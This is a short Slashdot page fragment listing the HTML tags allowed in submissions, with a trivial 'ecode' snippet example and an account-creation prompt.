Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...